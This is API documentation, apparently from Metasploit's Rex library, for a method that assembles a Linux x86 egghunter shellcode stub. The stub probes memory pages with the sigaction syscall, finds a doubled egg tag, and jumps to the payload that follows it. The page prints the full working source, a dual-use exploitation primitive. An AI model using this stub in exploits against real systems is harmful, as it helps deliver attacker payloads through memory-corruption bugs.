Module: Rex::Exploitation::Egghunter::Linux::X86
- Defined in:
- lib/rex/exploitation/egghunter.rb
Constant Summary
- Alias =
ARCH_X86
Instance Method Summary
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
Instance Method Details
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
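# File 'lib/rex/exploitation/egghunter.rb', line 247

# The egg hunter stub for linux/x86.
#
# Assembles a short x86 routine that scans memory for the 4-byte egg tag,
# which must appear twice back to back, and then jumps to the bytes that
# follow the second copy.  Memory is walked a page at a time: after
# aligning ecx to the end of the current page the stub issues the
# 'sigaction' syscall (0x43) with that address and, when al comes back as
# 0xf2 (presumably -EFAULT, i.e. the page is not readable), moves on to
# the next page instead of touching it.
#
# @param payload  [String] the payload the egg precedes; only forwarded to
#   checksum_stub, which may emit an extra verification step.
# @param badchars [String] forwarded to checksum_stub; this method performs
#   no badchar avoidance of its own.
# @param opts     [Hash] options:
#   - :eggtag   [String] the 4-byte tag to search for (required)
#   - :startreg [String, nil] register holding the address at which to
#     start searching; it is copied into ecx unless it already is ecx
# @return [String] the assembled stub bytes
# @raise [RuntimeError] if :eggtag is missing or is not exactly 4 bytes long
def hunter_stub(payload, badchars = '', opts = {})
  eggtag = opts[:eggtag]
  # Reject a missing tag explicitly; calling .length on nil would otherwise
  # surface as a NoMethodError instead of this message.
  # NOTE(review): the message quotes esize but the check is hard-coded to
  # 4 — confirm the two agree.
  if eggtag.nil? || eggtag.length != 4
    raise RuntimeError, "Invalid egg string! Need #{esize} bytes."
  end

  # scasd compares a little-endian dword, so render the tag in that byte
  # order as a hex immediate.
  marker = "0x%x" % eggtag.unpack('V').first
  checksum = checksum_stub(payload, badchars, opts)

  # Optional prologue: seed ecx from the caller-supplied register and skip
  # the initial page-alignment step by jumping straight to next_addr.
  startreg = opts[:startreg]
  startstub =
    if startreg
      load_ecx = startreg.downcase == 'ecx' ? '' : "\n\tmov ecx,#{startreg}"
      "#{load_ecx}\n\tjmp next_addr\n\t"
    else
      ''
    end

  assembly = "
    cld
    #{startstub}
  check_readable:
    or cx,0xfff
  next_addr:
    inc ecx
    push 0x43 ; use 'sigaction' syscall
    pop eax
    int 0x80
    cmp al,0xf2
    je check_readable

  check_for_tag:
    ; check that the tag matches once
    mov eax,#{marker}
    mov edi,ecx
    scasd
    jne next_addr
    ; it must match a second time too
    scasd
    jne next_addr

    ; check the checksum if the feature is enabled
  #{checksum}

    ; jump to the payload
    jmp edi
  "

  # The assembled bytes are the stub itself.
  Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
end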